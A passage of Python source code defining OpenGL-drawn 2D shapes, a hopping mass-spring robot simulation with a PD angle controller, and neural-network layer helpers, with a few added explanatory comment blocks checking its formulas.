self.vtsW = np.matlib.zeros((2, num_vts)) # Vertexes represented in World Coordinate System\n self.translation = np.mat([[x], [y]]) # Offset in World Coordinate System\n self.rotMat = np.matlib.eye(2) # Rotation Matrix of Element\n\n self.camera = camera # Camera if define\n self.vtsC = np.matlib.zeros((2, num_vts)) # Vertexes represent in Camera Coordinate System\n\n # Set Center of Rotation represented in Object Coordinate System\n def setPivotO(self, x, y):\n self.pivotO[0] = x\n self.pivotO[1] = y\n\n # Rotate Element around P(x,y) in World Coordinate System\n def rotateE(self, theta, x=0, y=0):\n rm = rad2rm(theta)\n t = np.mat([[x], [y]])\n self.vtsW = rm * (self.vtsW - t) + t\n\n # Rotate Element around pivot\n def rotateO(self, theta):\n rm = rad2rm(theta)\n t = self.translation + self.pivotO\n self.vtsW = rm * (self.vtsW - t) + t\n\n # Move Element\n def translate(self, dx, dy):\n t = np.mat([[dx], [dy]])\n self.vtsW += t\n\n def setPosition(self, x=0.0, y=0.0):\n self.translation = np.mat([[x], [y]])\n self.vtsW = self.rotMat * (self.vtsO - self.pivotO) + self.translation\n\n def setDirectionRad(self, theta=0.0):\n self.rotMat = rad2rm(theta)\n self.vtsW = self.rotMat * (self.vtsO - self.pivotO) + self.translation\n\n def setDirectionDeg(self, theta=0.0):\n self.rotMat = rad2rm(np.deg2rad(theta))\n self.vtsW = self.rotMat * (self.vtsO - self.pivotO) + self.translation\n\n def setTranslation(self, x, y): # This function does not refresh position or orientation of element\n self.translation[0] = x\n self.translation[1] = y\n\n def setRotMat(self, r00, r01, r10, r11):\n self.rotMat[0, 0] = r00\n self.rotMat[0, 1] = r01\n self.rotMat[1, 0] = r10\n 
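# Editorial note, not in the original file: remap() above is a plain linear
# map from [old_min, old_max] onto [new_min, new_max]. A couple of standalone
# spot checks of that formula (linmap is a hypothetical name used only here):
def linmap(x, old_min, old_max, new_min=0.0, new_max=1.0):
    return (x - 0.5 * (old_min + old_max)) * (new_max - new_min) / (old_max - old_min) \
        + 0.5 * (new_min + new_max)

assert linmap(5.0, 0.0, 10.0) == 0.5              # midpoint maps to midpoint
assert linmap(10.0, 0.0, 10.0, -1.0, 1.0) == 1.0  # upper bound maps to upper bound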
self.rotMat[1, 1] = r11\n\n def setRotMatRad(self, theta): # This function does not refresh position or orientation of element\n self.rotMat = rad2rm(theta)\n\n def setRotMatDeg(self, theta):\n self.rotMat = rad2rm(np.deg2rad(theta))\n\n def setRotMatSinCos(self, sin=0.0, cos=1.0):\n s = sin\n c = cos\n return np.mat([[c, -s], [s, c]])\n\n def refreshVtsW(self):\n self.vtsW = self.rotMat * (self.vtsO - self.pivotO) + self.translation\n\n def project2Camera(self):\n self.vtsC = self.camera.project(self.vtsW)\n\n\nclass Arrow(Element):\n def __init__(self, l=2.0, angle=0, x=0.0, y=0.0, h=1.0, s=1.0, v=1.0, camera=None):\n Element.__init__(self, num_vts=4, x=x, y=y, camera=camera)\n self.l = l\n self.rad = np.deg2rad(angle)\n self.start = np.mat([[x], [y]])\n self.end = np.mat([[x + l * np.cos(self.rad)], y + l * np.sin(self.rad)])\n self.wx = 0.2\n self.wy = 0.1\n self.setRotMatRad(self.rad)\n self.setTranslation(x, y)\n self.init_vtsO()\n self.refreshVtsW()\n self.hsv = [h, s, v]\n\n def init_vtsO(self):\n self.vtsO = np.mat([[0, self.l, self.l - self.wx, self.l - self.wx], [0, 0, self.wy, -self.wy]])\n\n def setLength(self, l):\n self.l = l\n self.end = np.mat([[self.start[0, 0] + l * np.cos(self.rad)], self.start[1, 0] + l * np.sin(self.rad)])\n self.init_vtsO()\n self.refreshVtsW()\n\n def draw(self):\n if self.camera == None:\n gl.glLineWidth(lw)\n rgb = mcol.hsv_to_rgb(self.hsv)\n gl.glColor4f(rgb[0], rgb[1], rgb[2], 0.5)\n gl.glBegin(gl.GL_LINES)\n gl.glVertex2f(self.vtsW[0, 0], self.vtsW[1, 0])\n gl.glVertex2f(self.vtsW[0, 1], self.vtsW[1, 1])\n gl.glEnd()\n gl.glBegin(gl.GL_LINE_STRIP)\n gl.glVertex2f(self.vtsW[0, -1], self.vtsW[1, -1])\n gl.glVertex2f(self.vtsW[0, -3], self.vtsW[1, -3])\n gl.glVertex2f(self.vtsW[0, -2], self.vtsW[1, -2])\n gl.glEnd()\n else:\n self.project2Camera()\n gl.glLineWidth(lw)\n rgb = mcol.hsv_to_rgb(self.hsv)\n gl.glColor4f(rgb[0], rgb[1], rgb[2], 0.5)\n gl.glBegin(gl.GL_LINES)\n gl.glVertex2f(self.vtsC[0, 0], self.vtsC[1, 0])\n gl.glVertex2f(self.vtsC[0, 1], self.vtsC[1, 1])\n gl.glEnd()\n gl.glBegin(gl.GL_LINE_STRIP)\n gl.glVertex2f(self.vtsC[0, -1], self.vtsC[1, -1])\n gl.glVertex2f(self.vtsC[0, -3], self.vtsC[1, -3])\n gl.glVertex2f(self.vtsC[0, -2], self.vtsC[1, -2])\n gl.glEnd()\n\n\nclass Circle:\n def __init__(self, x=0.0, y=0.0, radius=1.0, h=0.0, s=1., v=1., alpha=1., camera=None):\n self.x = x\n self.y = y\n self.radius = radius\n\n self.num_vts = 50\n self.vts = np.zeros((2, self.num_vts))\n self.camera = camera\n self.vtsC = np.zeros((2, self.num_vts))\n self.hsv = [h, s, v]\n self.alpha = alpha\n\n self.theta = 2 * np.pi / self.num_vts\n\n self.refreshVts()\n\n def refreshVts(self):\n for i in range(self.num_vts):\n self.vts[0, i] = self.x + self.radius * np.cos(i * self.theta)\n self.vts[1, i] = self.y + self.radius * np.sin(i * self.theta)\n\n def setPosition(self, x, y):\n self.x = x\n self.y = y\n self.refreshVts()\n\n def setRadius(self, r):\n self.radius = r\n self.refreshVts()\n\n def getPosition(self):\n return [self.x, self.y]\n\n def setColorH(self, h=0.):\n self.hsv[0] = h\n\n def setColor(self, color = np.ones(4)):\n self.hsv = color[:3]\n self.alpha = color[3]\n\n def setColorV(self, v):\n self.hsv[2] = v\n\n def draw(self):\n gl.glLineWidth(lw)\n rgb = mcol.hsv_to_rgb(self.hsv)\n gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)\n gl.glEnable(gl.GL_BLEND)\n gl.glColor4f(rgb[0], rgb[1], rgb[2], self.alpha)\n gl.glBegin(gl.GL_LINE_LOOP)\n if self.camera == None:\n for i in range(self.num_vts):\n gl.glVertex2f(self.vts[0, 
i], self.vts[1, i])\n gl.glEnd()\n else:\n self.vtsC = self.camera.project(self.vts)\n for i in range(self.num_vts):\n gl.glVertex2f(self.vtsC[0, i], self.vtsC[1, i])\n gl.glEnd()\n\nclass Curve:\n def __init__(self, x0=0., y0=0., x1=1., y1=1., dx0=1.5, dy0=0., dx1=1.5, dy1=0.,\n offset0=0., offset1=0.,h=0., s=1., v=1., alpha=1., camera=None):\n self.params = [dx0 + dx1 + 2*x0 - 2*x1, 3*x1 - dx1 - 3*x0 - 2*dx0, dx0, x0,\n dy0 + dy1 + 2*y0 - 2*y1, 3*y1 - dy1 - 3*y0 - 2*dy0, dy0, y0]\n self.x0 = x0\n self.y0 = y0\n self.x1 = x1\n self.y1 = y1\n self.dx0 = dx0\n self.dy0 = dy0\n self.dx1 = dx1\n self.dy1 = dy1\n self.offset0 = offset0\n self.offset1 = offset1\n self.numt = 30\n self.startPoint = 0\n self.endPoint = self.numt\n self.t = np.linspace(0, 1, self.numt)\n self.vts = np.zeros((2, self.numt))\n self.vtsC = np.zeros((2, self.numt))\n self.hsv = [h, s, v]\n self.alpha = alpha\n self.camera = camera\n\n self.refreshVts()\n\n # Animation\n self.propagationVel = 2\n self.inputColor = [h, s, v, alpha]\n self.color = (np.ones((4, self.numt)).T*self.inputColor).T\n self.signals = np.zeros(self.numt)\n\n def setInputColorH(self, h):\n self.color[0, self.startPoint] = h\n\n def setInputColorS(self, s):\n self.color[1, self.startPoint] = s\n\n def setInputColorV(self, v):\n self.color[2, self.startPoint] = v\n\n\n def setInputColorAlpha(self, a):\n self.color[3, self.startPoint] = a\n\n\n def setInputColor(self, color=np.ones(4)):\n self.color[:, self.startPoint] = color\n\n def setPropagationVel(self, v):\n self.propagationVel = int(v)\n\n def setInputSignal(self, s):\n self.signals[self.startPoint] = s\n\n def get_outputSignal(self):\n return self.signals[self.endPoint-1]\n\n\n def refreshVts(self):\n for i in range(self.numt):\n t = self.t[i]\n tvec = np.array([t ** 3, t ** 2, t, 1.0])\n x = np.dot(self.params[0:4], tvec)\n y = np.dot(self.params[4:], tvec)\n self.vts[0, i] = x\n self.vts[1, i] = y\n if self.offset0 != 0. or self.offset1 != 0.:\n l0 = np.linalg.norm([x-self.x0, y-self.y0])\n l1 = np.linalg.norm([self.x1-x, self.y1-y])\n if self.offset0 != 0 and self.startPoint == 0 and l0 >= self.offset0:\n self.startPoint = i\n if self.offset1 != 0 and self.endPoint == self.numt and l1 <= self.offset1:\n self.endPoint = i\n\n def refreshParams(self):\n self.params = [self.dx0 + self.dx1 + 2 * self.x0 - 2 * self.x1, 3 * self.x1 - self.dx1 - 3 * self.x0 - 2 * self.dx0,\n self.dx0, self.x0,\n self.dy0 + self.dy1 + 2 * self.y0 - 2 * self.y1, 3 * self.y1 - self.dy1 - 3 * self.y0 - 2 * self.dy0,\n self.dy0, self.y0]\n def setPoint0(self, x0, y0):\n self.x0 = x0\n self.y0 = y0\n self.refreshParams()\n self.refreshVts()\n\n def setPoint1(self, x1, y1):\n self.x1 = x1\n self.y1 = y1\n self.refreshParams()\n self.refreshVts()\n\n def setDPoint0(self, dx0, dy0):\n self.dx0 = dx0\n self.dy0 = dy0\n self.refreshParams()\n self.refreshVts()\n\n def setDPoint1(self, dx1, dy1):\n self.dx1 = dx1\n self.dy1 = dy1\n self.refreshParams()\n self.refreshVts()\n\n def getPoint0(self):\n return [self.x0, self.y0]\n\n def getPoint1(self):\n return [self.x1, self.y1]\n\n def signal2colorV(self, s):\n v = (2. * sigmoid(s) - 1.) 
* .5\n return v\n\n def draw(self):\n gl.glLineWidth(1)\n rgb = mcol.hsv_to_rgb(self.hsv)\n gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)\n gl.glEnable(gl.GL_BLEND)\n gl.glColor4f(rgb[0], rgb[1], rgb[2], self.alpha)\n gl.glBegin(gl.GL_LINE_STRIP)\n if self.camera == None:\n for i in range(self.endPoint-self.startPoint):\n gl.glVertex2f(self.vts[0, self.startPoint+i], self.vts[1, self.startPoint+i])\n gl.glEnd()\n else:\n self.vtsC = self.camera.project(self.vts)\n for i in range(self.endPoint-self.startPoint):\n id = self.endPoint-i-1\n self.signals[id] = self.signals[max(self.startPoint, id-self.propagationVel)]\n self.color[:, id] = self.color[:, max(self.startPoint, id-self.propagationVel)]\n col = mcol.hsv_to_rgb([self.color[0, id], self.color[1, id], self.signals[id]])#self.color[2, id] + self.signal2colorV(self.signals[id])])\n gl.glColor4f(col[0], col[1], col[2], self.color[3, id])\n gl.glVertex2f(self.vtsC[0, id], self.vtsC[1, id])\n gl.glEnd()\n\n\nclass Spring(Element):\n def __init__(self, length=1.0, angle=0.0, coils=8, width=0.2, k=1.0, x=0.0, y=0.0, h=1.0, s=0.0, v=1.0,\n camera=None):\n Element.__init__(self, num_vts=coils * 2 + 4, x=x, y=y, camera=camera)\n self.length = length # Length of the spring\n self.coils = coils # Number of coils of the spring\n self.width = width # Radius of the spring\n self.k = k\n self.rad = np.deg2rad(angle) # Direction of the spring\n self.start = np.mat([[x], [y]]) # Start point of the spring\n self.end = self.start + np.mat([[self.length * np.cos(self.rad)], [self.length * np.sin(self.rad)]])\n self.vec = self.end - self.start # The vector represent the spring\n self.init_vtsO()\n self.setRotMatRad(self.rad)\n self.refreshVtsW()\n self.hsv = [h, s, v] # Color of the spring\n\n def init_vtsO(self):\n self.vtsO[0, :] = np.linspace(0.0, self.length, self.num_vts, True)\n dl = self.length / (self.num_vts + 1)\n self.vtsO[0, 1] += 0.5 * dl\n self.vtsO[0, -2] -= 0.5 * dl\n self.vtsO[1, 2:-3:2] = 0.5 * self.width\n self.vtsO[1, 3:-2:2] = -0.5 * self.width\n\n def setLength(self, length):\n self.vtsO[0, :] = np.linspace(0.0, length, self.num_vts, True)\n dl = length / (self.num_vts + 1)\n self.vtsO[0, 1] += 0.5 * dl\n self.vtsO[0, -2] -= 0.5 * dl\n self.refreshVtsW()\n\n def resetLength(self):\n self.vtsO[0, :] = np.linspace(0.0, self.length, self.num_vts, True)\n dl = self.length / (self.num_vts + 1)\n self.vtsO[0, 1] += 0.5 * dl\n self.vtsO[0, -2] -= 0.5 * dl\n self.refreshVtsW()\n\n def setStart(self, x=0.0, y=0.0):\n self.start = np.mat([[x], [y]])\n self.vec = self.end - self.start\n self.length = np.linalg.norm(self.vec)\n self.rad = np.arctan2(self.vec[1, 0], self.vec[0, 0])\n self.setTranslation(x, y)\n self.setRotMatRad(self.rad)\n self.setLength(self.length)\n\n def setEnd(self, x=0.0, y=0.0):\n self.end = np.mat([[x], [y]])\n self.vec = self.end - self.start\n self.length = np.linalg.norm(self.vec)\n self.rad = np.arctan2(self.vec[1, 0], self.vec[0, 0])\n self.setRotMatRad(self.rad)\n self.setLength(self.length)\n\n def setStartEnd(self, x, y, x1, y1):\n self.start[0, 0] = x\n self.start[1, 0] = y\n self.end[0, 0] = x1\n self.end[1, 0] = y1\n self.vec = self.end - self.start\n self.length = np.linalg.norm(self.vec)\n self.rad = np.arctan2(self.vec[1, 0], self.vec[0, 0])\n self.setTranslation(x, y)\n self.setRotMatRad(self.rad)\n self.setLength(self.length)\n\n def draw(self):\n gl.glLineWidth(lw)\n rgb = mcol.hsv_to_rgb(self.hsv)\n gl.glColor4f(rgb[0], rgb[1], rgb[2], 0.5)\n gl.glBegin(gl.GL_LINE_STRIP)\n if self.camera == 
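# Editorial note, not in the original file: the eight entries of Curve.params
# above are the coefficients of a cubic Hermite segment,
# x(t) = a3*t^3 + a2*t^2 + a1*t + a0 (and likewise for y), chosen so that
# x(0) = x0, x(1) = x1, x'(0) = dx0 and x'(1) = dx1. A quick standalone check
# of that claim, using the class's default endpoints and tangents:
import numpy as np

x0, x1, dx0, dx1 = 0.0, 1.0, 1.5, 1.5
a = [dx0 + dx1 + 2 * x0 - 2 * x1, 3 * x1 - dx1 - 3 * x0 - 2 * dx0, dx0, x0]
p = np.poly1d(a)
assert np.isclose(p(0.0), x0) and np.isclose(p(1.0), x1)
assert np.isclose(p.deriv()(0.0), dx0) and np.isclose(p.deriv()(1.0), dx1)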
None:\n for i in range(self.num_vts):\n gl.glVertex2f(self.vtsW[0, i], self.vtsW[1, i])\n gl.glEnd()\n else:\n self.project2Camera()\n for i in range(self.num_vts):\n gl.glVertex2f(self.vtsC[0, i], self.vtsC[1, i])\n gl.glEnd()\n\n\ndef limit(x, lim):\n return max(min(x, lim), -lim)\n\n\n# Define ground function below\ndef ground(x):\n return 0\n\n\nclass Ground(Element):\n def __init__(self, height=0.0, l=20.0, w=0.1, x=0.0, y=0.0, h=0.0, s=0.0, v=1.0, alpha=0.5, camera=None):\n self.lnum = int((l - 2 * w) / w)\n Element.__init__(self, self.lnum * 2 + 2, x=x, y=y, camera=camera)\n self.height = height\n self.length = l\n self.width = w\n\n self.hsv = [h, s, v]\n self.alpha = alpha\n self.initVtsO()\n\n def initVtsO(self):\n self.vtsO[0, 0:self.lnum] = np.linspace(0, self.length - 2 * self.width, self.lnum) + 2 * self.width\n self.vtsO[0, self.lnum:2 * self.lnum] = np.linspace(0, self.length - 2 * self.width, self.lnum) + self.width\n self.vtsO[0, -1] = self.length\n self.vtsO[1, 0:self.lnum] -= self.width\n self.vtsO[0, :] -= self.length * 0.5\n self.vtsO[1, :] += self.height\n self.refreshVtsW()\n\n def draw(self):\n self.project2Camera()\n gl.glLineWidth(lw)\n rgb = mcol.hsv_to_rgb(self.hsv)\n gl.glColor4f(rgb[0], rgb[1], rgb[2], self.alpha)\n gl.glBegin(gl.GL_LINES)\n for i in range(self.lnum):\n gl.glVertex2f(self.vtsC[0, i], self.vtsC[1, i])\n gl.glVertex2f(self.vtsC[0, self.lnum + i], self.vtsC[1, self.lnum + i])\n gl.glVertex2f(self.vtsC[0, -2], self.vtsC[1, -2])\n gl.glVertex2f(self.vtsC[0, -1], self.vtsC[1, -1])\n gl.glEnd()\n\n\nclass MassSpring:\n def __init__(self, r=0.2, l=1.2, rad=-np.pi * 0.5, x=0.0, y=3., vx=0.0, vy=0.0, dt=0.01, camera=None):\n self.r = r # Radius of the head (m)\n self.l = l # Length of the leg (m)\n self.rad = rad # Direction of the leg (rad)\n self.m = 1.0 # Mass (kg)\n self.k = 1000.0 # Elastic coefficient of the spring\n self.i = 0.1 # Rotational inertia\n\n self.head = Circle(x, y, r, camera=camera)\n self.leg = Spring(l - r, self.rad, 6, 0.15 * self.l,\n x=x + r * np.cos(rad), y=y + r * np.sin(rad), camera=camera)\n # Neural network\n self.nn = NeuralNet(camera=camera)\n self.input_normalized = np.zeros((6,1))\n self.nn_vx_range = 10.0\n self.nn_vy_range = 10.\n self.nn_y_min = .2\n self.nn_y_max = 5.\n self.nn_rad_min = -np.pi * 5. 
/ 6.\n self.nn_rad_max = -np.pi / 6.\n\n self.vx_dst = 0.\n self.vy_dst = 0.\n self.y_dst = 2.\n self.rad_dst = -np.pi*.5\n # There are 3 states of the mass-spring\n # state 0: the mass-spring is flying\n # state 1: the mass-spring is standing\n # state 2: the mass-spring is lying down\n # state 3: hold in sky\n self.state = 0\n self.x = x # Position x of the head\n self.y = y # Position y of the head\n self.x0 = x + l * np.cos(rad) # Position x of foot\n self.y0 = y + l * np.sin(rad) # Position y of foot\n self.vec = np.mat([self.x - self.x0, self.y - self.y0]).T # Vector that point from foot to head\n self.norm_vec = np.linalg.norm(self.vec)\n self.vx = vx # Velocity x of the head\n self.vy = vy # Velocity y of the head\n self.vrad = 0.0 # Angular velocity of the leg\n self.u = 0.0 # Control input of the leg direction\n self.dt = dt # Simulation time step of the mass-spring system\n self.f = np.mat([0, 0]).T # Force of the spring\n\n self.lim_vrad = 500.0 * np.pi # Limit of angular velocity\n\n self.dx = 0.0 # Change of x position of the head in a time step\n self.dy = 0.0 # Change of y position of the head in a time step\n self.dvx = 0.0 # Change of velocity x of the head in a time step\n self.dvy = 0.0 # Change of velocity y of the head in a time step\n self.drad = 0.0 # Change of angle of the leg\n self.dvrad = 0.0 # Change of angular velocity of the leg\n\n # Measurement data\n self.control = False\n self.err = 0.0 # Angular error\n self.lerr = 0.0 # Last time step angular error\n self.derr = 0.0 # Change of angular error\n self.ierr = 0.0 # Integration of angular error\n self.errv = 0.0 # Angular error\n self.lerrv = 0.0 # Last time step angular error\n self.derrv = 0.0 # Change of angular error\n # PID controller parameters\n self.kp = 10.0 # Proportionality coefficient\n self.ki = 0.0 # Integral coefficient\n self.kd = 10.0 # Differential coefficient\n self.kpv = 2.0 # Velocity proportionality coefficient\n self.kdv = 1.0 # Velocity differential coefficient\n self.ilim = 1000.0 # Limit of integral term\n self.ulim = 1000.0 # Limit of output\n\n self.pe = self.m * gravity * self.y # Potential energy\n self.ke = 0.5 * self.m * (self.vx ** 2 + self.vy ** 2) # Kinetic energy\n self.energy = self.pe + self.ke # Energy\n\n def init(self, x, y, rad, vx, vy):\n self.state = 0\n self.x = x\n self.y = max(self.l, y)\n self.rad = rad\n self.vx = vx\n self.vy = vy\n\n def construct_neural_network_from_file(self, name='mass_spring_neural_network.npz'):\n self.nn.construct_from_file(name)\n\n def network_cal_rad(self, vx=0., vy=0., y=0., vx_dst=0., vy_dst=0., y_dst=0.):\n if self.nn.dimIn == 4:\n self.input_normalized[0, 0] = remap(vx, -self.nn_vx_range, self.nn_vx_range)\n self.input_normalized[1, 0] = remap(y, -self.nn_y_min, self.nn_y_max)\n self.input_normalized[2, 0] = remap(vx_dst, -self.nn_vx_range, self.nn_vx_range)\n self.input_normalized[3, 0] = y_dst#remap(y_dst, -self.nn_y_min, self.nn_y_max)\n self.rad_dst = remap(self.nn.cal_output(self.input_normalized[:4])[0, 0], 0., 1., self.nn_rad_min,\n self.nn_rad_max)\n\n elif self.nn.dimIn == 5:\n self.input_normalized[0, 0] = remap(vx, -self.nn_vx_range, self.nn_vx_range)\n self.input_normalized[1, 0] = remap(vy, -self.nn_vy_range, self.nn_vy_range)\n self.input_normalized[2, 0] = remap(y, self.nn_y_min, self.nn_y_max)\n self.input_normalized[3, 0] = remap(vx_dst, -self.nn_vx_range, self.nn_vx_range)\n self.rad_dst = remap(self.nn.cal_output(self.input_normalized[:5])[0, 0], 0., 1., self.nn_rad_min,\n self.nn_rad_max)\n\n elif 
self.nn.dimIn == 6:\n self.input_normalized[0, 0] = remap(vx, -self.nn_vx_range, self.nn_vx_range)\n self.input_normalized[1, 0] = remap(vy, -self.nn_vy_range, self.nn_vy_range)\n self.input_normalized[2, 0] = remap(y, self.nn_y_min, self.nn_y_max)\n self.input_normalized[3, 0] = remap(vx_dst, -self.nn_vx_range, self.nn_vx_range)\n self.input_normalized[4, 0] = remap(vy_dst, -self.nn_vy_range, self.nn_vy_range)\n self.input_normalized[5, 0] = remap(y_dst, self.nn_y_min, self.nn_y_max)\n self.rad_dst = remap(self.nn.cal_output(self.input_normalized)[0, 0], 0., 1., self.nn_rad_min, self.nn_rad_max)\n\n def set_jump_dst(self, vx_dst=0., vy_dst=0., y_dst=.8):\n self.vx_dst = vx_dst\n self.vy_dst = vy_dst\n self.y_dst = y_dst\n\n def adjustVelocity(self):\n self.pe = self.m * gravity * self.y\n self.ke = self.energy - self.pe\n adj_vnorm = np.sqrt(2 * self.ke / self.m)\n vnorm = np.sqrt(self.vx ** 2 + self.vy ** 2)\n k = adj_vnorm / vnorm\n self.vx *= k\n self.vy *= k\n\n def updateState(self):\n # print(self.state)\n # When the mass-spring is flying\n if self.state == 0:\n self.dx = self.vx * self.dt\n self.dy = self.vy * self.dt\n self.dvx = 0\n self.dvy = -gravity * self.dt\n self.drad = self.vrad * self.dt\n self.dvrad = self.u / self.i * self.dt\n\n self.x += self.dx\n self.y += self.dy\n self.vx += self.dvx\n self.vy += self.dvy\n self.rad += self.drad\n self.vrad += self.dvrad\n if self.rad > np.pi:\n self.rad -= 2.0 * np.pi\n if self.rad < - np.pi:\n self.rad += 2.0 * np.pi\n self.vrad += self.dvrad\n self.vrad = limit(self.vrad, self.lim_vrad)\n self.x0 = self.x + self.l * np.cos(self.rad)\n self.y0 = self.y + self.l * np.sin(self.rad)\n self.vec = np.mat([self.x - self.x0, self.y - self.y0]).T\n\n # Condition of changing state\n # flying -> stop\n if ground(self.x) >= self.y - self.r:\n self.state = 2\n self.y = self.r\n\n # flying -> standing\n if ground(self.x0) >= self.y0:\n self.state = 1\n self.y0 = 0\n self.norm_vec = np.linalg.norm(self.vec)\n self.f = self.vec * self.k * (self.l / self.norm_vec - 1.0)\n self.adjustVelocity()\n # When the mass-spring is standing\n if self.state == 1:\n self.dx = self.vx * self.dt\n self.dy = self.vy * self.dt\n self.dvx = self.f[0, 0] / self.m * self.dt\n self.dvy = (self.f[1, 0] / self.m - gravity) * self.dt\n\n self.x += self.dx\n self.y += self.dy\n self.vx += self.dvx\n self.vy += self.dvy\n self.vec = np.mat([self.x - self.x0, self.y - self.y0]).T\n self.norm_vec = np.linalg.norm(self.vec)\n self.rad = np.arctan2(-self.vec[1, 0], -self.vec[0, 0])\n self.f = self.vec * self.k * (self.l / self.norm_vec - 1.0)\n\n # Condition of changing state\n # standing -> flying\n if self.norm_vec >= self.l:\n self.state = 0\n self.y0 = 0\n self.adjustVelocity()\n if self.control:\n if self.nn.dimIn == 4:\n delta_y = .5*self.vy**2/gravity\n y_top = delta_y+self.y\n self.network_cal_rad(vx=self.vx, y=y_top,\n vx_dst=self.vx_dst, y_dst=self.y_dst)\n elif self.nn.dimIn == 6:\n self.network_cal_rad(vx=self.vx, vy=self.vy, y=self.y,\n vx_dst=self.vx_dst, vy_dst=self.vy_dst, y_dst=self.y_dst)\n # print('vx: '+str(round(self.vx, 3)))\n\n # standing -> stop\n if ground(self.x) >= self.y - self.r:\n self.state = 2\n self.y = self.r\n\n if self.state == 3:\n self.drad = self.vrad * self.dt\n self.dvrad = self.u / self.i * self.dt\n self.rad += self.drad\n self.vrad += self.dvrad\n self.x0 = self.x + self.l * np.cos(self.rad)\n self.y0 = self.y + self.l * np.sin(self.rad)\n\n def hold(self):\n self.state = 3\n\n def updateInput(self, dstRad):\n if not 
self.control:\n self.u = 0\n else:\n self.err = dstRad - self.rad\n while self.err > np.pi:\n self.err -= np.pi * 2.0\n while self.err < -np.pi:\n self.err += np.pi * 2.0\n self.ierr += self.err\n self.ierr = limit(self.ierr, self.ilim)\n self.derr = self.err - self.lerr\n self.lerr = self.err\n\n dstv = self.kp * self.err + self.ki * self.ierr + self.kd * self.derr\n self.errv = dstv - self.vrad\n self.derrv = self.errv - self.lerrv\n self.lerrv = self.errv\n self.u = self.kpv * self.errv + self.kdv * self.derrv\n self.u = limit(self.u, self.ulim)\n\n def update(self, dt=0.01, control=True):\n self.control = control\n self.dt = dt\n if control:\n self.updateInput(self.rad_dst)\n self.updateState()\n\n def draw(self):\n self.head.setPosition(self.x, self.y)\n self.leg.setStartEnd(self.x + self.r * np.cos(self.rad), self.y + self.r * np.sin(self.rad),\n self.x0, self.y0)\n # self.leg.setStart(self.x, self.y)\n # self.leg.setEnd(self.x0, self.y0)\n self.head.draw()\n self.leg.draw()\n\n\n# Neural Network\ndef sigmoid(a):\n return 1.0 / (1.0 + np.exp(-a))\n\n\ndef dsigmoid(s):\n return s * (1 - s)\n\n\ndef relu(a):\n k = .3\n kk = 0.01 * k\n a[a >= 0] *= k\n a[a < 0] *= kk\n return a\n\n\ndef drelu(r):\n k = .3\n kk = 0.01 * k\n r[r >= 0] = k\n r[r < 0] = kk\n return r\n\ndef map2color(x, h0=.59, h1=.03):\n k = 10.\n s1 = sigmoid(k*x)\n s0 = 1. - s1\n rad0 = h0*twoPi\n rad1 = h1*twoPi\n vec0 = np.array([np.cos(rad0), np.sin(rad0)])\n vec1 = np.array([np.cos(rad1), np.sin(rad1)])\n vec = s0*vec0 + s1*vec1\n h = (np.arctan2(vec[1], vec[0]))/twoPi\n if h < 0:\n h += 1\n s = np.linalg.norm(vec)\n return [h, s, .75*s, 1.]\n\n\ntwoPi = 2.*np.pi\n# z = w*x + b\n# y = sigmoid(z)\nclass Layer:\n def __init__(self, dimX=3, dimY=2, actFunc=1):\n self.dimX = dimX\n self.dimY = dimY\n self.weightRange = 6.\n self.biasRange = 3.\n self.weight = self.weightRange * (np.random.random((self.dimY, self.dimX)) - 0.5)\n self.bias = self.biasRange*(np.random.random((self.dimY, 1)) - 0.5)\n self.actFunc = actFunc # Activation function: 1:sigmoid 2:relu\n\n self.x = np.zeros((self.dimX, 1))\n self.y = np.zeros((self.dimY, 1))\n self.djz = np.zeros((self.dimY, 1))\n self.djw = np.zeros((self.dimY, self.dimX))\n self.djb = np.zeros((self.dimY, 1))\n self.djy = np.zeros((self.dimY, 1))\n self.djx = np.zeros((self.dimX, 1))\n\n # Graph\n self.nodes = np.zeros(self.dimY, dtype=Circle)\n self.edges = np.zeros((self.dimY, self.dimX), dtype=Curve)\n # Color map\n h0 = 0.59\n h1 = 0.03\n self.k = 1.\n rad0 = h0*twoPi\n rad1 = h1*twoPi\n self.vec0 = np.array([np.cos(rad0), np.sin(rad0)])\n self.vec1 = np.array([np.cos(rad1), np.sin(rad1)])\n\n self.nodesColor = np.ones((self.dimY, 4))\n\n def random_init_parameters(self):\n self.weight = self.weightRange * (np.random.random((self.dimY, self.dimX)) - 0.5)\n self.bias = self.biasRange * (np.random.random((self.dimY, 1)) - 0.5)\n\n def get_parameter(self):\n return [self.weight, self.bias, self.actFunc]\n\n def set_parameter(self, parameter):\n self.weight = parameter[0]\n self.bias = parameter[1]\n self.actFunc = parameter[2]\n\n def map2nodesColor(self, v):\n s1 = v#sigmoid(self.k * v)\n s0 = 1 - s1\n vecs = s0*self.vec0 + s1*self.vec1\n h = np.arctan2(vecs[:, 1], vecs[:, 0])/twoPi\n h[h < 0.] 
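# Editorial sketch, not part of the original file: the control law in
# MassSpring.updateInput() above, reduced to its core. The angle error is
# wrapped into [-pi, pi] (the original uses while-loops; a modulo is used
# here), an outer loop turns it into a desired angular velocity, and an inner
# PD loop turns the velocity error into the torque u. The integral term and
# output limits of the original are omitted; the gains mirror the class
# defaults (kp=10, kd=10, kpv=2, kdv=1). Function names are hypothetical.
import numpy as np

def wrap_angle(err):
    return (err + np.pi) % (2.0 * np.pi) - np.pi

def cascaded_pd(dst_rad, rad, vrad, state, kp=10.0, kd=10.0, kpv=2.0, kdv=1.0):
    err = wrap_angle(dst_rad - rad)
    derr, state['lerr'] = err - state['lerr'], err
    dstv = kp * err + kd * derr           # outer loop: desired angular velocity
    errv = dstv - vrad
    derrv, state['lerrv'] = errv - state['lerrv'], errv
    return kpv * errv + kdv * derrv       # inner loop: torque command u

state = {'lerr': 0.0, 'lerrv': 0.0}
u = cascaded_pd(-np.pi / 2.0, -np.pi / 3.0, 0.0, state)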
